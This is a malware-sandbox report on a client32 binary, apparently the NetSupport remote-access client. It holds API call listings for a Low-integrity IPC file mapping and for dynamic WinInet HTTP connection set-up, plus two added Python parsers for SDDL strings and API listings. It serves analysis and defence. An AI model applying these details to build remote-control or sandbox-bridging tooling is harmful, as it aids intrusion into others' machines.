__CRT_INIT@12 149 API calls 125566->125567 125567->125562 125568->125551 125570 11165b9f __tsopen_nolock 125569->125570 125571 11165ba7 125570->125571 125572 11165c21 125570->125572 125628 11169bb0 HeapCreate 125571->125628 125574 11165c27 125572->125574 125575 11165c82 125572->125575 125580 11165c45 125574->125580 125586 11165bb0 __tsopen_nolock 125574->125586 125716 11169e7b 66 API calls _doexit 125574->125716 125576 11165c87 125575->125576 125577 11165ce0 125575->125577 125579 11167cda ___set_flsgetvalue 3 API calls 125576->125579 
125577->125586 125722 11167fde 79 API calls __freefls@4 125577->125722 125578 11165bac 125578->125586 125629 1116804c GetModuleHandleW 125578->125629 125582 11165c8c 125579->125582 125585 11165c59 125580->125585 125717 1116dabe 67 API calls _free 125580->125717 125587 1116649e __calloc_crt 66 API calls 125582->125587 125720 11165c6c 70 API calls __mtterm 125585->125720 125586->125557 125591 11165c98 125587->125591 125588 11165bbc __RTC_Initialize 125592 11165bc0 125588->125592 125598 11165bcc GetCommandLineA 125588->125598 125591->125586 125594 11165ca4 DecodePointer 125591->125594 125713 11169bce HeapDestroy 125592->125713 125593 11165c4f 125718 11167d2b 70 API calls _free 125593->125718 125599 11165cb9 125594->125599 125597 11165c54 125719 11169bce HeapDestroy 125597->125719 125654 11173675 GetEnvironmentStringsW 125598->125654 125602 11165cd4 125599->125602 125603 11165cbd 125599->125603 125607 1115f2c5 _free 66 API calls 125602->125607 125721 11167d68 66 API calls 4 library calls 125603->125721 125607->125586 125609 11165cc4 GetCurrentThreadId 125609->125586 125610 11165bea 125714 11167d2b 70 API calls _free 125610->125714 125614 11165c0a 125614->125586 125715 1116dabe 67 API calls _free 125614->125715 125620 1110c880 125619->125620 125621 1110c8a1 125620->125621 125623 1110c8b4 ___DllMainCRTStartup 125620->125623 125624 1110c88c 125620->125624 125739 1110c7d0 125621->125739 125623->125561 125624->125623 125625 1110c7d0 ___DllMainCRTStartup 7 API calls 125624->125625 125627 1110c895 125625->125627 125626 1110c8a8 125626->125561 125627->125561 125628->125578 125630 11168060 125629->125630 125631 11168069 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 125629->125631 125723 11167d2b 70 API calls _free 125630->125723 125633 111680b3 TlsAlloc 125631->125633 125636 111681c2 125633->125636 125637 11168101 TlsSetValue 125633->125637 125634 11168065 125634->125588 125636->125588 125637->125636 125638 11168112 125637->125638 125724 11169c37 EncodePointer 
EncodePointer __init_pointers _doexit __initp_misc_winsig 125638->125724 125640 11168117 EncodePointer EncodePointer EncodePointer EncodePointer 125725 1116fc72 InitializeCriticalSectionAndSpinCount 125640->125725 125642 11168156 125643 111681bd 125642->125643 125644 1116815a DecodePointer 125642->125644 125727 11167d2b 70 API calls _free 125643->125727 125646 1116816f 125644->125646 125646->125643 125647 1116649e __calloc_crt 66 API calls 125646->125647 125648 11168185 125647->125648 125648->125643 125649 1116818d DecodePointer 125648->125649 125650 1116819e 125649->125650 125650->125643 125651 111681a2 125650->125651 125726 11167d68 66 API calls 4 library calls 125651->125726 125653 111681aa GetCurrentThreadId 125653->125636 125655 11173691 WideCharToMultiByte 125654->125655 125660 11165bdc 125654->125660 125657 111736c6 125655->125657 125658 111736fe FreeEnvironmentStringsW 125655->125658 125659 11166459 __malloc_crt 66 API calls 125657->125659 125658->125660 125661 111736cc 125659->125661 125667 1116d879 GetStartupInfoW 125660->125667 125661->125658 125662 111736d4 WideCharToMultiByte 125661->125662 125663 111736e6 125662->125663 125664 111736f2 FreeEnvironmentStringsW 125662->125664 125665 1115f2c5 _free 66 API calls 125663->125665 125664->125660 125666 111736ee 125665->125666 125666->125664 125668 1116649e __calloc_crt 66 API calls 125667->125668 125674 1116d897 125668->125674 125669 11165be6 125669->125610 125680 111735ba 125669->125680 125670 1116da42 GetStdHandle 125673 1116da0c 125670->125673 125671 1116649e __calloc_crt 66 API calls 125671->125674 125672 1116daa6 SetHandleCount 125672->125669 125673->125670 125673->125672 125675 1116da54 GetFileType 125673->125675 125679 1116da7a InitializeCriticalSectionAndSpinCount 125673->125679 125674->125669 125674->125671 125674->125673 125678 1116d98c 125674->125678 125675->125673 125676 1116d9c3 InitializeCriticalSectionAndSpinCount 125676->125669 125676->125678 125677 1116d9b8 GetFileType 125677->125676 
125677->125678 125678->125673 125678->125676 125678->125677 125679->125669 125679->125673 125681 111735d4 GetModuleFileNameA 125680->125681 125682 111735cf 125680->125682 125684 111735fb 125681->125684 125734 1116d294 94 API calls __setmbcp 125682->125734 125728 11173420 125684->125728 125686 11165bf6 125686->125614 125691 11173344 125686->125691 125688 11166459 __malloc_crt 66 API calls 125689 1117363d 125688->125689 125689->125686 125690 11173420 _parse_cmdline 76 API calls 125689->125690 125690->125686 125692 1117334d 125691->125692 125694 11173352 _strlen 125691->125694 125736 1116d294 94 API calls __setmbcp 125692->125736 125695 1116649e __calloc_crt 66 API calls 125694->125695 125698 11165bff 125694->125698 125700 11173387 _strlen 125695->125700 125696 111733d6 125697 1115f2c5 _free 66 API calls 125696->125697 125697->125698 125698->125614 125707 11169c8e 125698->125707 125699 1116649e __calloc_crt 66 API calls 125699->125700 125700->125696 125700->125698 125700->125699 125701 111733fc 125700->125701 125702 1116857f _strcpy_s 66 API calls 125700->125702 125704 11173413 125700->125704 125703 1115f2c5 _free 66 API calls 125701->125703 125702->125700 125703->125698 125705 1116a592 __invoke_watson 10 API calls 125704->125705 125706 1117341f 125705->125706 125708 11169c9c __IsNonwritableInCurrentImage 125707->125708 125737 111690ab EncodePointer 125708->125737 125710 11169cba __initterm_e 125712 11169cdb __IsNonwritableInCurrentImage 125710->125712 125738 1115f5f5 76 API calls __cinit 125710->125738 125712->125614 125713->125586 125714->125592 125715->125610 125716->125580 125717->125593 125718->125597 125719->125585 125720->125586 125721->125609 125722->125586 125723->125634 125724->125640 125725->125642 125726->125653 125727->125636 125730 1117343f 125728->125730 125733 111734ac 125730->125733 125735 11172db1 76 API calls x_ismbbtype_l 125730->125735 125731 111735aa 125731->125686 125731->125688 125732 11172db1 76 API calls _parse_cmdline 125732->125733 
125733->125731 125733->125732 125734->125681 125735->125730 125736->125694 125737->125710 125738->125712 125740 1110c814 EnterCriticalSection 125739->125740 125741 1110c7ff InitializeCriticalSection 125739->125741 125742 1110c835 125740->125742 125741->125740 125743 1110c863 LeaveCriticalSection 125742->125743 125744 1110c770 ___DllMainCRTStartup 4 API calls 125742->125744 125743->125626 125744->125742 125745 6ce01dfc 125746 6ce0c840 125745->125746 125747 6ce01e0b 125745->125747 125787 6ce0c84a GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 125746->125787 125752 6ce01d3f 125747->125752 125750 6ce01e16 125751 6ce0c845 125751->125751 125753 6ce01d4b __heapwalk 125752->125753 125754 6ce0b8b1 125753->125754 125755 6ce01d57 125753->125755 125794 6ce0b359 HeapCreate 125754->125794 125756 6ce01d61 125755->125756 125761 6ce0b911 125755->125761 125758 6ce02967 125756->125758 125759 6ce01d6a __set_flsgetvalue TlsGetValue 125756->125759 125767 6ce01dd1 __heapwalk 125758->125767 125795 6ce028f9 43 API calls __threadstart@4 125758->125795 125764 6ce01d83 125759->125764 125760 6ce0b8b6 125773 6ce17b77 125760->125773 125781 6ce0b8dd GetCommandLineA GetCommandLineW 125760->125781 125762 6ce27448 _cexit 125761->125762 125765 6ce17b4e 125761->125765 125761->125773 125762->125765 125764->125767 125788 6ce01e1c 125764->125788 125771 6ce17b5c 125765->125771 125800 6ce76d78 DeleteCriticalSection free 125765->125800 125767->125750 125770 6ce27457 125801 6ce4c335 DeleteCriticalSection free DeleteCriticalSection DecodePointer TlsFree 125770->125801 125771->125750 125797 6ce76d78 DeleteCriticalSection free 125773->125797 125798 6ce766ba HeapDestroy 125773->125798 125799 6ce4c335 DeleteCriticalSection free DeleteCriticalSection DecodePointer TlsFree 125773->125799 125776 6ce01d9f DecodePointer 125780 6ce01db4 125776->125780 125778 6ce2745c 125802 6ce766ba HeapDestroy 125778->125802 125783 6ce27484 free 125780->125783 125784 6ce01dbc 
_initptd GetCurrentThreadId 125780->125784 125785 6ce0b8fd 125781->125785 125782 6ce27461 125782->125783 125783->125773 125784->125767 125785->125773 125796 6ce0c427 14 API calls 125785->125796 125787->125751 125790 6ce01e25 125788->125790 125791 6ce01d93 125790->125791 125792 6ce2f1d0 Sleep 125790->125792 125803 6ce009a9 125790->125803 125791->125773 125791->125776 125793 6ce01e45 125792->125793 125793->125790 125793->125791 125794->125760 125795->125767 125796->125761 125797->125773 125798->125773 125799->125773 125800->125770 125801->125778 125802->125782 125804 6ce009b5 125803->125804 125806 6ce009c5 125803->125806 125805 6ce2f3d7 125804->125805 125804->125806 125812 6ce00815 10 API calls _asctime 125805->125812 125807 6ce009df RtlAllocateHeap 125806->125807 125809 6ce2f3f5 _callnewh 125806->125809 125810 6ce009f6 125806->125810 125807->125806 125807->125810 125809->125806 125809->125810 125810->125790 125811 6ce2f3dc 125811->125790 125812->125811

Control-flow Graph

• Executed
• Not Executed

[Interactive control-flow graph of the function starting at 1109d240; the node and edge data rendered by the report viewer is not reproduced here.]
APIs
  • Part of subcall function 1109C4F0: GetCurrentProcess.KERNEL32(000F01FF,?,1102FA03,00000000,00000000,00080000,B34DC9D5,00080000,00000000,00000000), ref: 1109C51D
  • Part of subcall function 1109C4F0: OpenProcessToken.ADVAPI32(00000000), ref: 1109C524
  • Part of subcall function 1109C4F0: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109C535
  • Part of subcall function 1109C4F0: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109C559
• LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,B34DC9D5,00080000,00000000,00000000), ref: 1109D2D5
• InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109D2EE
• SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109D2F9
• GetVersionExA.KERNEL32(?), ref: 1109D310
• GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D37E
• SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109D393
• FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D3A4
• CreateFileMappingA.KERNEL32(000000FF,1102FA03,00000004,00000000,?,?), ref: 1109D3E0
• GetLastError.KERNEL32 ref: 1109D3ED
• LocalFree.KERNEL32(?), ref: 1109D416
• LocalFree.KERNEL32(?), ref: 1109D423
• GetLastError.KERNEL32 ref: 1109D440
• MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109D45E
• LocalFree.KERNEL32(?), ref: 1109D489
• LocalFree.KERNEL32(?), ref: 1109D496
  • Part of subcall function 1109C460: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109D32E), ref: 1109C468
  • Part of subcall function 1109C4A0: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109C4B4
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D4C2
• LocalFree.KERNEL32(?), ref: 1109D58B
• LocalFree.KERNEL32(?), ref: 1109D598
• _memset.LIBCMT ref: 1109D5B0
• GetTickCount.KERNEL32 ref: 1109D5B8
• GetCurrentProcessId.KERNEL32 ref: 1109D664
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D67F
• CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109D6CB
• GetLastError.KERNEL32 ref: 1109D6D4
• GetLastError.KERNEL32(00000000), ref: 1109D6DB
• CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D710
• GetLastError.KERNEL32 ref: 1109D719
• GetLastError.KERNEL32(00000000), ref: 1109D720
• CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109D756
• GetLastError.KERNEL32 ref: 1109D75F
• GetLastError.KERNEL32(00000000), ref: 1109D766
• CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D79B
                                                                                                            • GetLastError.KERNEL32 ref: 1109D7AA
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 1109D7AD
                                                                                                            • LocalFree.KERNEL32(?), ref: 1109D7D5
                                                                                                            • LocalFree.KERNEL32(?), ref: 1109D7E2
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 1109D813
                                                                                                            • CreateThread.KERNEL32(00000000,00002000,Function_0009CDD0,00000000,00000000,00000030), ref: 1109D82D
                                                                                                            • ResetEvent.KERNEL32(?), ref: 1109D85C
                                                                                                            • ResetEvent.KERNEL32(?), ref: 1109D862
                                                                                                            • ResetEvent.KERNEL32(?), ref: 1109D868
                                                                                                            • SetEvent.KERNEL32(?), ref: 1109D86E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
                                                                                                             • Associated: 00000007.00000002.3304051388.0000000011000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304334547.00000000111EB000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.00000000111F1000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.0000000011257000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.000000001127C000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.0000000011283000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.000000001128A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.0000000011297000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.00000000112A7000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.00000000112AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.00000000112D9000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.0000000011325000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                                            • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                                            • API String ID: 3291243470-2792520954
                                                                                                            • Opcode ID: 2773d804223ff8e0a2aa968baca401bea7f470192e3e967c4d90a613c88c9993
                                                                                                            • Instruction ID: 1c086480991888a7e74c242cefb21caf9cc7b937459cab308f9abb1f8f7b4179
                                                                                                            • Opcode Fuzzy Hash: 2773d804223ff8e0a2aa968baca401bea7f470192e3e967c4d90a613c88c9993
                                                                                                            • Instruction Fuzzy Hash: 7F1282B5E402599FDB20DF65CCD4EAEB7F9BB88308F0089A9E14D97240D771A984CF61
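The IPC set-up routine above hands the SDDL string S:(ML;;NW;;;LW) to ConvertStringSecurityDescriptorToSecurityDescriptorA (resolved at run time from Advapi32.dll) before it creates its file mapping and the four events. That string defines no owner, group or DACL; it only attaches a mandatory-label ACE to the SACL, labelling the objects Low integrity with the NO_WRITE_UP policy, which is what lets a process running at Low integrity (a sandboxed browser renderer, for instance) still write to them. The following is an added example, not code from the Joe Sandbox report or from NetSupport: a small SDDL parser in Python that decodes this ACE and the common token abbreviations. The parser and its function names are mine; the sample input is the string copied from the listing, and the DACL-bearing string in the usage note is constructed to show the other segments.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed input: the SDDL string found in the IPC routine's string table above.
SAMPLE_SDDL = "S:(ML;;NW;;;LW)"

ACE_TYPES = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED",
             "AU": "SYSTEM_AUDIT", "ML": "SYSTEM_MANDATORY_LABEL"}
RIGHTS = {
    # mandatory-label policy bits (only meaningful in an ML ACE)
    "NW": "NO_WRITE_UP", "NR": "NO_READ_UP", "NX": "NO_EXECUTE_UP",
    # generic and standard rights commonly seen in DACL ACEs
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE",
    "GX": "GENERIC_EXECUTE", "RC": "READ_CONTROL", "SD": "DELETE",
    "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}
WELL_KNOWN_SIDS = {
    "LW": ("S-1-16-4096", "Low Mandatory Level"),
    "ME": ("S-1-16-8192", "Medium Mandatory Level"),
    "HI": ("S-1-16-12288", "High Mandatory Level"),
    "SI": ("S-1-16-16384", "System Mandatory Level"),
    "SY": ("S-1-5-18", "Local System"),
    "BA": ("S-1-5-32-544", "Administrators"),
    "WD": ("S-1-1-0", "Everyone"),
}

@dataclass
class Ace:
    ace_type: str
    flags: str
    rights: List[str]
    sid: str          # token as written in the SDDL, e.g. "LW"
    sid_string: str   # resolved SID, e.g. "S-1-16-4096"

def _resolve_sid(token):
    return WELL_KNOWN_SIDS.get(token, (token, token))[0]

def _split_rights(text):
    # Rights are either one hex mask ("0x1f01ff") or a run of two-letter tokens ("GRGW").
    if text.lower().startswith("0x"):
        return [text]
    return [text[i:i + 2] for i in range(0, len(text), 2)]

def _parse_acl(body):
    """Parse the ACE list of a DACL/SACL segment; ACL flags before the first '(' are ignored."""
    aces = []
    for m in re.finditer(r"\(([^)]*)\)", body):
        fields = m.group(1).split(";")
        if len(fields) != 6:
            raise ValueError("malformed ACE: " + m.group(0))
        ace_type, flags, rights, _obj_guid, _inherit_guid, sid = fields
        aces.append(Ace(ace_type, flags, _split_rights(rights), sid, _resolve_sid(sid)))
    return aces

def parse_sddl(sddl):
    """Split an SDDL string into its owner, group, DACL and SACL components."""
    names = {"O": "owner", "G": "group", "D": "dacl", "S": "sacl"}
    out = {"owner": None, "group": None, "dacl": [], "sacl": []}
    marks = list(re.finditer(r"([OGDS]):", sddl))   # SIDs and ACEs never contain ':'
    for i, m in enumerate(marks):
        end = marks[i + 1].start() if i + 1 < len(marks) else len(sddl)
        body = sddl[m.end():end]
        key = names[m.group(1)]
        out[key] = _resolve_sid(body) if key in ("owner", "group") else _parse_acl(body)
    return out

def describe(ace):
    who = WELL_KNOWN_SIDS.get(ace.sid, (ace.sid, ace.sid))[1]
    rights = ", ".join(RIGHTS.get(r, r) for r in ace.rights)
    return f"{ACE_TYPES.get(ace.ace_type, ace.ace_type)}: {rights} for {who} ({ace.sid_string})"

def mandatory_label(sddl):
    """Return the integrity floor and policy set by the SACL's ML ACE, or None if there is none."""
    for ace in parse_sddl(sddl)["sacl"]:
        if ace.ace_type == "ML":
            return {"level": ace.sid_string, "policy": [RIGHTS.get(r, r) for r in ace.rights]}
    return None

if __name__ == "__main__":
    for ace in parse_sddl(SAMPLE_SDDL)["sacl"]:
        print(describe(ace))
```

Run against the string from the listing, mandatory_label() reports level S-1-16-4096 with policy NO_WRITE_UP and parse_sddl() returns an empty DACL list; a constructed string such as O:BAG:SYD:P(A;;GA;;;SY)(A;;GR;;;WD)S:(ML;;NW;;;LW) exercises the owner, group and DACL segments as well.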

                                                                                                             Control-flow Graph (image not captured): function 11029200-11029833, with blocks calling LoadLibraryA, GetProcAddress, SetLastError, GetLastError, InternetOpenA, InternetConnectA, GetDesktopWindow and FreeLibrary, plus internal subroutines 1115F231, 1115F2C5, 1113E630, 11160A20, 11080B80, 1110C530, 11027460, 110274B0, 110CEC50 and 1115DFA1.
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(WinInet.dll,B34DC9D5,759223A0,?,00000000), ref: 11029235
                                                                                                            • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110292CF
                                                                                                            • SetLastError.KERNEL32(00000078), ref: 110292E3
                                                                                                            • _malloc.LIBCMT ref: 11029307
                                                                                                            • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029321
                                                                                                            • GetLastError.KERNEL32 ref: 11029342
                                                                                                            • _free.LIBCMT ref: 1102934E
                                                                                                            • _malloc.LIBCMT ref: 11029357
                                                                                                            • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029371
                                                                                                            • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 110293AB
                                                                                                            • InternetOpenA.WININET(11190240,?,?,000000FF,00000000), ref: 110293CA
                                                                                                            • SetLastError.KERNEL32(00000078), ref: 110293D4
                                                                                                            • SetLastError.KERNEL32(00000078), ref: 110293E1
                                                                                                            • SetLastError.KERNEL32(00000078), ref: 110293EB
                                                                                                            • _free.LIBCMT ref: 110293F5
                                                                                                              • Part of subcall function 1115F2C5: HeapFree.KERNEL32(00000000,00000000,?,11167E86,00000000,?,1110C53E,?,?,?,?,111413D2,?,?,?), ref: 1115F2DB
                                                                                                              • Part of subcall function 1115F2C5: GetLastError.KERNEL32(00000000,?,11167E86,00000000,?,1110C53E,?,?,?,?,111413D2,?,?,?), ref: 1115F2ED
                                                                                                            • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029475
                                                                                                            • SetLastError.KERNEL32(00000078), ref: 1102948E
                                                                                                            • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 110294A1
                                                                                                            • InternetConnectA.WININET(000000FF,111955E0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 110294BE
                                                                                                            • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110294DA
                                                                                                            • SetLastError.KERNEL32(00000078), ref: 110294F3
                                                                                                            • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029519
                                                                                                            • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 1102956D
                                                                                                            • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 110296D3
                                                                                                            • SetLastError.KERNEL32(00000078), ref: 110297A0
                                                                                                            • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110297F2
                                                                                                            • SetLastError.KERNEL32(00000078), ref: 11029809
                                                                                                            • FreeLibrary.KERNEL32(?), ref: 1102981A
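The routine above does not import WinInet statically: it loads WinInet.dll with LoadLibraryA, resolves every function it needs by name through GetProcAddress (InternetOpenA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetQueryDataAvailable, InternetQueryOptionA, InternetCloseHandle) and, on the branch where a lookup fails, sets error 0x78 (ERROR_CALL_NOT_IMPLEMENTED). The InternetConnectA arguments give nServerPort = 0x50 (80) and dwService = 3 (INTERNET_SERVICE_HTTP). Imports resolved this way never appear in the PE import table, so they have to be recovered from a listing like this one. The following is an added example, not code from the Joe Sandbox report or from NetSupport: a Python parser for this API-reference line format that pulls out the loaded library, the resolved names in first-seen order, the connect parameters and the error codes set. The sample lines are copied from the listing; the parser and its function names are mine.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed input: lines copied from the WinInet routine's API list above.
SAMPLE_LISTING = """\
• LoadLibraryA.KERNEL32(WinInet.dll,B34DC9D5,759223A0,?,00000000), ref: 11029235
• GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110292CF
• SetLastError.KERNEL32(00000078), ref: 110292E3
• GetLastError.KERNEL32 ref: 11029342
• GetProcAddress.KERNEL32(?,InternetOpenA), ref: 110293AB
• InternetOpenA.WININET(11190240,?,?,000000FF,00000000), ref: 110293CA
  • Part of subcall function 1115F2C5: HeapFree.KERNEL32(00000000,00000000,?,11167E86,00000000), ref: 1115F2DB
• GetProcAddress.KERNEL32(?,InternetConnectA), ref: 110294A1
• InternetConnectA.WININET(000000FF,111955E0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 110294BE
• GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029519
• GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 1102956D
"""

# One bullet line: optional "Part of subcall function X:" prefix, Api.MODULE, optional (args), "ref: addr".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]            # raw argument tokens; "?" means the sandbox could not recover it
    ref: int                   # address of the call site
    subcall_of: Optional[int]  # set when the call is attributed to a callee of this function

def _hex(token):
    try:
        return int(token, 16)
    except ValueError:
        return None

def parse_listing(text):
    """Parse Joe Sandbox API-reference bullet lines; non-matching lines (section labels) are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = m.group("args").split(",") if m.group("args") else []
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16), sub))
    return calls

def loaded_libraries(calls):
    return [c.args[0] for c in calls if c.api in ("LoadLibraryA", "LoadLibraryW") and c.args]

def resolved_imports(calls):
    """Names passed to GetProcAddress, deduplicated in first-seen order."""
    seen, names = set(), []
    for c in calls:
        if c.api == "GetProcAddress" and len(c.args) >= 2 and c.args[1] not in seen:
            seen.add(c.args[1])
            names.append(c.args[1])
    return names

SERVICES = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}

def connect_params(calls):
    """Port and service type from InternetConnectA(hInternet, server, port, user, pass, service, flags, ctx)."""
    for c in calls:
        if c.api == "InternetConnectA" and len(c.args) >= 6:
            service = _hex(c.args[5])
            return {"port": _hex(c.args[2]), "service": SERVICES.get(service, service)}
    return None

def error_codes_set(calls):
    """Distinct values the function passes to SetLastError, as integers."""
    codes = set()
    for c in calls:
        if c.api == "SetLastError" and c.args:
            v = _hex(c.args[0])
            if v is not None:
                codes.add(v)
    return sorted(codes)

if __name__ == "__main__":
    calls = parse_listing(SAMPLE_LISTING)
    print(loaded_libraries(calls), resolved_imports(calls), connect_params(calls), error_codes_set(calls))
```

The same parser works on any function's API list in this report; pointing it at the IPC routine earlier on the page, for example, recovers the Advapi32.dll load and the ConvertStringSecurityDescriptorToSecurityDescriptorA lookup from its subcall lines.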
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
                                                                                                             • Associated: 00000007.00000002.3304051388.0000000011000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304334547.00000000111EB000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.00000000111F1000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.0000000011257000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.000000001127C000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.0000000011283000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.000000001128A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.0000000011297000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.00000000112A7000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.00000000112AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.00000000112D9000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                             • Associated: 00000007.00000002.3304359735.0000000011325000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$ErrorLast$FreeInternetLibrary_free_malloc$ConnectHeapLoadOpen
                                                                                                            • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                                            • API String ID: 921868004-913974648
                                                                                                            • Opcode ID: 4323dc13209f1141cde394b290c5c300ebcb294d4ba28f398435307f7bbc8dca
                                                                                                            • Instruction ID: 1a6f29b930c56522642f3e0528693d97e2c9ce6eee6fc69bea7c9705341dbda6
                                                                                                            • Opcode Fuzzy Hash: 4323dc13209f1141cde394b290c5c300ebcb294d4ba28f398435307f7bbc8dca
                                                                                                            • Instruction Fuzzy Hash: 3C128EB0D002299BDB11CFA9CC88A9EFBF8FF89344F60856AE555F7240EB745941CB61
